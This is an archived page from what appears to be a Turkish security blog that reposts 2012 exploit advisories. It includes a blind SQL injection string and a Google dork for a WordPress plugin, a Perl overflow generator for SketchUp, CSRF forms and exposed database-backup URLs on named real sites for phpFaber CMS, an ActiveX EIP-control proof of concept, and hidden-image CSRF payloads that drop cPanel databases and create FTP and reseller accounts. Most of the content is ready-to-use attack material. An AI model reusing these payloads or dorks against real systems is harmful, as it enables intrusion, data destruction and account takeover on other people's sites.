Archive for 29 Ekim 2012

admin | 29 Ekim 2012
One comment

WordPress Easy Webinar Plugin Blind SQL Injection Vulnerability

WordPress Easy Webinar Plugin Eklentisinde Blind SQL Injection Açığı bulundu. Açığın Oluşum yerleri ve kullanımı şu şekilde.

# Exploit Title: WordPress Easy Webinar Plugin Blind SQL Injection Vulnerability

# Vendor Homepage: www.easywebinarplugin.com

# Date: 10/26/2012

# Author: Robert Cooper (robert.cooper [at] areyousecure.net)

# Tested on: [Linux/Windows 7]

#Vulnerable Parameters: wid=


# Google Dork: allinurl: get-widget.php?wid=

##############################################################
Exploit:

www.example.com/wp-content/plugins/webinar_plugin/get-widget.php?wid=[SQLi]

Note: The HTTP response will read 404, but this is false:

www.example.com/wp-content/plugins/webinar_plugin/get-widget.php?wid=3' or 'x'='x

This will result in the page loading correctly and show that the plugin is vulnerable to injection (string).
##############################################################

www.areyousecure.net

# Shouts to the Belegit crew
Category: Genel | Tags: ,
admin | 26 Ekim 2012
No comments

Google SketchUp 8 – Stack Based Buffer Overflow Vulnerability

Google SketchUp 8 – Stack Based Buffer Overflow Vulnerability

#!/usr/bin/perl 
#  
# 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 
# 0          _                   __           __       __                         1 
# 1        /' \            __  /'__`\        /\ \__  /'__`\                       0 
# 0       /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___               1 
# 1       \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\              0 
# 0          \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/               1 
# 1           \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\               0 
# 0            \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/               1 
# 1                       \ \____/ >> Exploit database separated by exploit       0 
# 0                        \/___/          type (local, remote, DoS, etc.)        1 
# 1                                                                               0 
# 0       [x] Official Website: http://www.1337day.com                            1 
# 1       [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                      0 
# 0                                                                               1 
# 1                  $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$                   0 
# 0                  I'm NuxbieCyber Member From Inj3ct0r TEAM                    1 
# 1                  $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$                   0 
# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 
# 
# Title  : Google SketchUp 8 - Stack Based Buffer Overflow Vulnerability. 
# Author : NuxbieCyber 
# Link   : http://sketchup. 
# Type   : Local. 
# Risk   : Critical. 
# Vendor : Google Inc. 
# Version: Google SketchUp 8. 
 
# Tested On  : Windows XP Service Pack 2 ID 32x. 
# Time & Date: 26 Oktober 2012 - 01:15 PM. 
 
# Execute: perl google-su.pl 
# Open with Notepad++ file BoF.txt, Select ALL , then Copy. 
# After copying the whole line, 
# Go To Google SketchUp --> Tools --> 3D Text --> Place 3D Text --> Paste the line into field and click Place. 
 
my $junk = "A" x 31337 ; 
 
$payload= $junk; 
open(myfile,'>BoF.txt'); 
print myfile $payload; 
close(myfile); 
print "cr00ted ".length($payload)." bytes\n"; 
 
# - Special Thanks: 
# ...:::' 1337day - Inj3ct0r TEAM ':::... 
# BoSs r0073r & All 31337 Member Inj3ct0r TEAM,,, 
# , And All Inj3ct0r Fans & All Hacktivist,,, 
 
# NuxbieSec
Category: Genel | Tags:
admin | 26 Ekim 2012
No comments

phpFaber CMS Multiple Vulnerabilities

phpFaber CMS Multiple Vulnerabilities

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 
0     _                   __           __       __                     1 
1   /' \            __  /'__`\        /\ \__  /'__`\                   0 
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 
1                  \ \____/ >> Exploit database separated by exploit   0 
0                   \/___/          type (local, remote, DoS, etc.)    1 
1                                                                      1 
0  [+] Site            : 1337day.com                                   0 
1  [+] Support e-mail  : submit[at]1337day.com                         1 
0                                                                      0 
1               #########################################              1 
0               I'm DaOne member from Inj3ct0r Team                    1 
1               #########################################              0 
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 
########################################## 
# Exploit Title: phpFaber CMS Multiple Vulnerabilities 
# Date: 2012-10-24 
# Author: DaOne aka Mocking Bird 
# Home: 1337day Inj3ct0r Exploit Database  
# Software Link: http://www.phpfaber.com/files/phpfaber_cms_enc.zip 
# Category: webapps/php 
# Version: 2.4.0 
########################################## 
 
[#] CSRF Change Administrator Settings: 
<html> 
<body onload="document.form0.submit();"> 
<form method="POST" name="form0" action="http://[target]/cms_admin/index.php?page=adm"> 
<input type="hidden" name="name" value="admin2"> 
<input type="hidden" name="email" value=""> 
<input type="hidden" name="login" value="adm"> 
<input type="hidden" name="pwd" value="passw0rd"> 
<input type="hidden" name="pwd2" value="passw0rd"> 
</form> 
</body> 
</html> 
 
 
[#] Database Disclosure: 
http://host/cms_content/backup/[year-month-day]db_name.zip 
# Example: 
http://www.afzarazma.com/fa/cms_content/backup/[10-06-08]afzarazm_fadb.zip 
http://www.wispkhan.com.au/cms_content/backup/[12-01-14]entire_site.zip 
 
 
[#] Full Path Disclosure: 
# PoC 
POST /cms_admin/index.php?page=login HTTP/1.1 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: ar,en-us;q=0.7,en;q=0.3 
Accept-Encoding: gzip, deflate 
Connection: keep-alive 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 29 
 
login=adm&pwd[]=aaaaa&go=Login 
 
 
---- 
Thanks to: TheGreaTTeAm/LCA and Inj3ct0r Team
Category: Genel | Tags: , ,
admin | 26 Ekim 2012
No comments

Aladdin Knowledge System Ltd. PrivAgent ActiveX Control 2.0 Multiple Vulnerabilities

Aladdin Knowledge System Ltd. PrivAgent ActiveX Control 2.0 Multiple Vulnerabilitie

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=============================================================================================
 FILE INFO:
=============================================================================================
 Aladdin Knowledge System Ltd. PrivAgent ActiveX Control 2.0 Multiple Remote Vulnerabilities

 File:                     PrivAgent.ocx
 InternalName:             PrivAgentAx
 OriginalFilename:         PrivAgent.ocx
 FileVersion:              2.0.0.0
 FileDescription:          PrivAgent ActiveX Control
 Product:                  Privilege
 ProductVersion:           02.0
 Debug:                    False
 Patched:                  False
 PreRelease:               False
 PrivateBuild:             True
 SpecialBuild:             False
 Language:                 English (United States)
 MD5 hash:                 c96dfc282b6bdc177abd076a9bb94933
=============================================================================================
 OBJECT SAFETY REPORT:
=============================================================================================
 CLSID:                    {09F68A41-2FBE-11D3-8C9D-0008C7D901B6}
 ProgID:                   PrivAgentAx.PrivAgent.1
 Description:              PrivAgent Class
 RegKey Safe for Script:   True
 RegKey Safe for Init:     True
 Implements IObjectSafety: False
=============================================================================================
 TESTED ON:
=============================================================================================
 Windows XP Professional SP3
 Windows 7 Professional SP3
=============================================================================================
 DOWNLOADABLE FROM:
=============================================================================================
 ftp://ftp.aladdin.com//pub/privilege/activex2002.zip
=============================================================================================
 BUG INFO:
=============================================================================================
 This ocx seems to be really poor coded. I've found so many errors that I felt too choosy
 (yes Mrs. Elsa Fornero, I AM choosy and I AM proud of it) to test any other method.
 Below there's a list of stack-based buffer overflow, insecure file download and a proof
 of concept which exploits a good old fashioned (or trivial, if you like) stack based
 buffer overflow, triggered simply passing to the "ChooseFilePath" method a string longer
 than 268 bytes. In this case, after a memory reading exception, we are in full control of
 EIP.
 Here it is the list of vulnerable methods, guess which ones are vulnerable to arbitrary
 file download? 🙂
 
 #1
 Function DownloadLicense (
        ByVal sURL  As String , 
        ByVal sPath  As String , 
        ByVal bInstall  As Boolean 
 )  As Long

 #2
 Function ChooseFilePath (
        ByVal sFileName  As String 
 )  As String

 #3
 Function InstallLicense (
        ByVal szLicensePath  As String 
 )  As Long

 #4
 Function InstallPrivilege (
        ByVal szInstFilePath  As String 
 )  As Long

 #4
 Function DownloadPrivilege (
        ByVal szURL  As String , 
        ByVal szTargetDir  As String , 
        ByVal bInstall  As Boolean 
 )  As Long

 #4
 Function InstallDevExt (
        ByVal szDevExtPath  As String 
 )  As Long

 #5
 Function DownloadDevExt (
        ByVal szURL  As String , 
        ByVal szTargetPath  As String , 
        ByVal bInstall  As Boolean 
 )  As Long
=============================================================================================
 PROOF OF CONCEPT:
=============================================================================================

<html>
 <object classid='clsid:09F68A41-2FBE-11D3-8C9D-0008C7D901B6' id='test'></object>
  <script language = 'vbscript'>
   buffer    = String(268, "A")
   getEIP    = unescape("bbbb")
   buffer_2  = "CCCCCCCC"
   exception = unescape("%5A%0B%02%10") '0x10020B5A pop ESI-pop-ret from PrivAgent.ocx
   buffer_3  = unescape("EEEE" + String(2712, "F"))

   test.ChooseFilePath buffer + getEIP + buffer_2 + exception + buffer_3
  </script>
</html>

=============================================================================================
 CRASH DUMP:
=============================================================================================
 0:005> g
 WARNING: Continuing a non-continuable exception
 (1138.1304): Access violation - code c0000005 (first chance)
 First chance exceptions are reported before any exception handling.
 This exception may be expected and handled.
 eax=00000000 ebx=076886d8 ecx=00385f70 edx=086dc628 esi=0253cfa4 edi=0253cd24
 eip=62626262 esp=0253cce4 ebp=41414141 iopl=0         nv up ei pl zr na pe nc
 cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
 62626262 ??              ???
=============================================================================================
 FIX:
=============================================================================================
 Set kill-bit to stop the activeX control
=============================================================================================

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)

iQIcBAEBAgAGBQJQijFXAAoJEJlK/ai8vywm9ooP/RTuGJMOI+t8SABs9y2BSUR4
oj59/J4zF/Ofw7Id/LN3MHAbqUVXWpUQBtjyjIPPGyAReVacn1lUScVhP11R1bRD
bXbOUw+BU2pfvSmyFaVPQlLe+T6umHaFrEqpbIhgsJSARD8qOQPpd7crywzQXau0
fa/kf/tpK1tJ42A5gnCV7UybRb4mfmwcz46UfZY2mMYDPzBYInqZJ8+cAgaih/1k
bdbti+Cpy9Pj+33I2q1YSnlMGqVjIKqT+FCfdVN1DL03/U/TjAeddcCz6fHxpu+t
nuLWRrAV3CLrSQtYpluBBjASHer5/KzLFZBPZ8MOi97wA+C2oiOnMPbkNDQfjBn2
EzXnKn1hKNI20WBb48j3oqohQYAFksOu9MErWLekF/tvVkhywtM1qQFRrQrqLf5c
xJl0DnbM4RiCOmOiAVYRAwTGhYnSsLUYrytO38JINS3TcdyeoZJrNHXcCzZrJJkl
xmZ8Yqmq3xmEkPQ6YcEybJrzL9j1cFo4wJEkuggr9kEpgbg34N6oQn631QirEdN2
WUo9w02Rk4W5Jh637DojUjOru2aBA1aGxM92Db1X445dt+VdYhOUUdQVQC+X9xJm
o0g8NWQSJtGQgTY/u/ZH8fpAcsGcij23Ktq+gc1ma0Sc5U89b64ny2YFsjWxmhcm
NH/Cs44PsO755FWU917q
=WA+e
-----END PGP SIGNATURE-----
Category: Genel | Tags:
admin | 25 Ekim 2012
No comments

cpanel 11.32.5 (build 11) 11.32.5.11 CSRF Vulnerabilities

cpanel 11.32.5 (build 11) 11.32.5.11 CSRF Açığı bulundu Açığa ilişkin exploit ve Açıklamalar şu şekilde

========== 
Vulnerable Software: cPanel version : 11.32.5 (build 11)-11.32.5.11 [ cPanel Pro ] 
Vulnerability: CSRF 
Vendor: cpanel.net 
========== 
 
===================================================================== 
Tested version: Your current cPanel version : 11.32.5 (build 11)-11.32.5.11 [ cPanel Pro ] 
 
Aka: Cpanel Accelerated 2 
via 
WHM 11.32.5 (build 11) 
 
===================================================================== 
 
CSRF: Drop Database: (Method $_GET) 
 
<img src="http://***********.net:2082/frontend/x3/sql/deldb.html?db=armenian_music" heigth="0" 
width="0" /> 
 
Here we are going to drop database named: armenian_music 
===================================================================== 
 
CSRF: Drop mysql user: (Method $_GET) 
 
 
<img src="http://************.net:2082/frontend/x3/sql/deluser.html?user=armenian_adserve" 
heigth="0" width="0" /> 
Here we are going to drop mysql user named: armenian_adserver )) 
 
===================================================================== 
CSRF: Change email address: (Contact Information & Preferences) (Method $_GET) 
Changing email address to:  
 
<img 
src="http://***********.net:2082/frontend/x3/contact/saveemail.html?email=&sec 
ond_email=&notify_disk_limit=1&notify_bandwidth_limit=1&notify_email_quota_limit=1" 
heigth="0" width="0" /> 
 
 
===================================================================== 
 
CSRF adding FTP account: 
 
username: akastep 
password: akastep 
host is target host. 
 
 
<img 
src="http://***********.net:2082/json-api/cpanel?cpanel_jsonapi_version=2&cpanel_jsonapi_module=Ftp&cpanel_ 
jsonapi_func=addftp&user=akastep&pass=akastep&homedir=/&quota=0&cache_fix=owned_by_akastep" 
heigth="0" width="0" /> 
 
===================================================================== 
 
 
CSRF Drop FTP account: 
 
Deletes existent ftp account named: axaxa 
 
<img 
src="http://************.net:2082/json-api/cpanel?cpanel_jsonapi_version=2&cpanel_jsonapi_module=Ftp&cpanel 
_jsonapi_func=delftp&user=axaxa&cache_fix=OWNED" heigth="0" width="0" /> 
 
===================================================================== 
 
 
CSRF change Apache handler: 
 
(Parse .gif file as php script) 
 
<img 
src="http://***********.net:2082/frontend/x3/mime/addhandle.html?handle=application/x-httpd-php&ext=.gif&su 
bmit=Add" heigth="0" width="0" /> 
===================================================================== 
 
 
CSRF Delete handler: 
 
 
<img src="http://***********.net:2082/frontend/x3/mime/delhandle.html?userhandle=.php" heigth="0" 
width="0" /> 
 
 
===================================================================== 
 
WHM 11.32.5 (build 11) 
 
CSRF: Add Reseller setup 
with domain: owned.com 
username: owned111 
password: MYVERYSTRONGGOESHERE 
And contact email:  
 
<img 
src="http://***********.net:2086/scripts5/wwwacct?sign=&plan=Reseller setup&domain=owned.com&username=o 
wned111&password=MYVERYSTRONGGOESHERE&contactemail=&dbuser=owned&msel=n,y,1,n, 
x3,1,1,1,1,1,1000,n,0,0,default,en,,,Reseller setup&pkgname=&featurelist=default& 
;quota=1&bwlimit=1000&maxftp=1&maxpop=1&maxlst=1&maxsql=1&maxsub=1&maxpark=0&maxaddon=0& 
amp;cgi=1&cpmod=x3&language=en&hasuseregns=1&dkim=1&mxcheck=local" heigth="0" 
width="0" /> 
 
================================================
Category: Genel | Tags: ,
« Older Entries   Recent Entries »